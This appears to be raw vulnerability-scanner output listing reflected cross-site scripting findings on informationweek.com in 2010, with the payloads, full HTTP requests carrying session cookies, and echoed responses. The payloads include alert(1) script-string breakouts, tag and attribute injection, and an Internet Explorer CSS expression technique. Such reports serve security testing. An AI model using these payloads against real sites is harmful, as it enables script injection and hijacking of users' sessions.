HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:05 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:05 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30177
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/data_protection/faac6'-alert(1)-'1cbe64795bd;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=440288387;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4f61'-alert(1)-'57a5eb76caf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsf4f61'-alert(1)-'57a5eb76caf/storage/systems/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:45 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:45 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30248
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsf4f61'-alert(1)-'57a5eb76caf/storage/systems/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=284287330;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 432a7"><script>alert(1)</script>26975a2ac8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news432a7"><script>alert(1)</script>26975a2ac8d/storage/systems/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:43 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:43 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30298
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news432a7"><script>alert(1)</script>26975a2ac8d/storage/sy;kvarticleid=;kvauthor=;loc=300;grp=923710056" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64aa5"><script>alert(1)</script>3f36d426111 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/storage64aa5"><script>alert(1)</script>3f36d426111/systems/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:48 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:48 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30301
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage64aa5"><script>alert(1)</script>3f36d426111/sy;kvarticleid=;kvauthor=;loc=300;grp=263710926" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d262c'-alert(1)-'f03ee8bad27 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storaged262c'-alert(1)-'f03ee8bad27/systems/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:50 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:50 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30239
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storaged262c'-alert(1)-'f03ee8bad27/systems/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=30553092;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80f2d'-alert(1)-'3d1c306f06b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/storage/systems80f2d'-alert(1)-'3d1c306f06b/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:00 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:00 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30223
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/systems80f2d'-alert(1)-'3d1c306f06b/showArtic;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=592064166;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e38af"><a%20b%3dc>5a436d3b796 was submitted in the REST URL parameter 3. This input was echoed as e38af"><a b=c>5a436d3b796 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/storage/systemse38af"><a%20b%3dc>5a436d3b796/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:55 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:55 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30225
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/systemse38af"><a b=c>5a436d3b796/showArticle;kvarticleid=;kvauthor=;loc=300;grp=396796437" target="_blank"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960f0"a%3d"b"589ae9c61ef was submitted in the REST URL parameter 4. This input was echoed as 960f0"a="b"589ae9c61ef in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /news/storage/systems/showArticle.jhtml960f0"a%3d"b"589ae9c61ef HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:24:03 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:24:03 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30179
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/news/storage/systems/showArticle960f0"a="b"589ae9c61ef;kvarticleid=;kvauthor=;loc=300;grp=808100674" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86883"><script>alert(1)</script>0981919ad59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletters86883"><script>alert(1)</script>0981919ad59/DR_subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:29 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:29 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30273
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newsletters86883"><script>alert(1)</script>0981919ad59/DR_;kvarticleid=;kvauthor=;loc=300;grp=861803794" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e72'-alert(1)-'281d8c05b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newslettersd8e72'-alert(1)-'281d8c05b5/DR_subscribe.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:31 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:31 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30124
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/newslettersd8e72'-alert(1)-'281d8c05b5/DR_subscribe;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=28082873;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99475"><a%20b%3dc>13b5779542c was submitted in the REST URL parameter 2. This input was echoed as 99475"><a b=c>13b5779542c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /newsletters/99475"><a%20b%3dc>13b5779542c HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30392
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Newsletters_Welcome_Ad_1x1;key=/newsletters/99475"><a b=c>13b5779542c;kvarticleid=;kvauthor=;loc=300;grp=44057614" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c4a6'-alert(1)-'3095eedd6cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsletters/2c4a6'-alert(1)-'3095eedd6cc HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:22:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:22:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30426
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Newsletters_Welcome_Ad_1x1;key=/newsletters/2c4a6'-alert(1)-'3095eedd6cc;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=820673269;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93a86'-alert(1)-'df28b1dcacc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsletters/subscribe.jhtml93a86'-alert(1)-'df28b1dcacc HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:14 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:14 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30564
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Newsletters_Welcome_Ad_1x1;key=/newsletters/subscribe93a86'-alert(1)-'df28b1dcacc;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=146578575;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96c7"%20style%3dx%3aexpr/**/ession(alert(1))%2037b2e1b4505 was submitted in the REST URL parameter 1. This input was echoed as d96c7" style=x:expr/**/ession(alert(1)) 37b2e1b4505 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /take.jhtmld96c7"%20style%3dx%3aexpr/**/ession(alert(1))%2037b2e1b4505 HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:01 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:01 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 30195
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/taked96c7" style=x:expr/**/ession(alert(1)) 37b2e1b4505;kvarticleid=;kvauthor=;loc=300;grp=530466894" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 751d6'-alert(1)-'0a15a6cfe4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /take.jhtml751d6'-alert(1)-'0a15a6cfe4b HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 00:23:03 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sun, 12 Dec 2010 00:23:03 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 29832
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/take751d6'-alert(1)-'0a15a6cfe4b;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=354757675;misc='+new Date().getTime()+'"> ...[SNIP]...
